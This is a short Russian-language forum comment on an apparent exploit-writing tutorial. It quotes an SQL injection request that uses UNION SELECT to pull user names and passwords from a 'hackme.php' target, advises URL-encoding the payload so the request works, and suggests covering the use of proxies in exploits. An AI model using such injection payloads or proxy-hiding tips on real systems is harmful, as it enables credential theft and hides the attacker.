Неплохая статья
Вставлю свои 5 копеек

1)GET / HTTP/1.0
Connection: close

последнее не обязательно согласно протоколу HTTP версии 1.0

2) "GET $dir/hackme.php?id=5' UNION SELECT name, password FROM users WHERE id='$member_id'/* HTTP/1.0\r\n";
Хм.. было бы кстати закодировать в urlencode() все это хозяйство, потому что если встретятся символ &, серверу это не понравится

3) кстати, было бы нелишним рассмотреть интересующий новичков вопрос - использование прокси в эксплоитах. хотя бы банально http-прокси с запросом GET http://site.com/

Ну вроде все, что хотел сказать.